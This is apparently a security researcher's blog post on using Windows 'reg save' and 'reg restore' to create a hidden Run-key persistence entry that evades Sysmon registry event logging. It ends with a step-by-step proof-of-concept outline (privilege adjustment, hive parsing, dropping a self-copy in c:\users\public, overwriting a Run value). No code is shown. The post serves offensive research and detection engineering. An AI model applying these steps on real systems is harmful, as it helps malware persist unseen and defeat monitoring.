The Windows Registry, a fundamental component of the Windows Operating System, empowers users to fine-tune system policies and manipulate low-level configuration settings. However, this registry's capabilities have also made it a target for exploitation by malicious actors and adversaries, who exploit this enigmatic database to carry out their malicious activities.
As indicated by the title, we will delve into how I discovered a method to leverage the functionalities of 'reg save' and 'reg restore' to establish persistence while adeptly evading detection measures.
In this blog post I will cover the following subjects:
- How it started? A Brief Overview
- Challenge
- Sysmon Registry Event Evasion
- Proof of Concept (POC) Development
- "reg save" and "reg restore" mechanism
- parsing the registry backup file
- RegF Header
- HiveBin and Cell Record
- References
How it started? A Brief Overview
Figure 1 - registry saved hive modification |
Figure 2 : after reg restore |
Challenge
In this test, we can conclude that we have successfully identified a method to establish persistence through the utilization of 'reg save' and 'reg store.' However, a crucial next step involves finding an automated process to modify the saved registry hive. This is essential in order to create a persistence entry within the registry run key. Hence, the challenge at hand is to determine the methodology for effectively parsing the registry backup file.Sysmon Registry Event Evasion
figure 3 : Registry callback function |
- RegNtDeleteKey
- RegNtRenameKey
- RegNtPostCreateKey
- RegNtPostDeleteKey
- RegNtPostSetValueKey
figure 4 : REG_NOTIFY_CLASS filtering |
Proof of Concept (POC) Development
Prior to delving into the use case of my proof of concept (POC), I took the initiative to gain a comprehensive understanding of the inner workings behind two essential components
"reg save" and "reg restore" Mechanism: My primary focus was to grasp the underlying mechanisms of both "reg save" and "reg restore." This approach allowed me to emulate their functionalities within my code autonomously, eliminating the need for external invocations.
Upon inspecting the code of reg.exe, a notable revelation emerged: the initial step involves the adjustment of the process token's privilege. Initially, the "SeBackupPrivilege" is granted, enabling the preservation of the registry hive through the utilization of the RegSaveKeyExW() API. Subsequently, the focus shifts to the "SeRestorePrivilege" which is activated to facilitate the restoration of the registry backup file, accomplished by invoking the RegRestoreKeyW() API.
Parsing the Registry Backup File: Equally important was the task of developing a method to effectively parse the registry backup file. By knowing its structure, I could ensure seamless extraction and utilization of critical information contained within the file.
figure 5 : regf file header |
figure 6: cell record type |
figure 7: registry value data enumeration |
- Adjust Token Privilege
SeBackupPrivilege
to be able to saveHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
registry hive. - saved the registry hive to "save_reg.hive"
- Parse registry hive structure (
save_reg.hive
) to look for registry value key data string to be modify. - compute the length of the registry value key data string during parsing, then used that length to generate random file name.
- dropped a copy of itself in
c:\users\public\{random_filename}.exe
- create a copy of
save_reg.hive
->mod_save_reg.hive
- modify the current registry value key data string of
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
with the file path of its file copy. - Adjust Token Privilege to
SeRestorePrivilege
- trigger RegRestore via
RegRestoreKeyW()
API.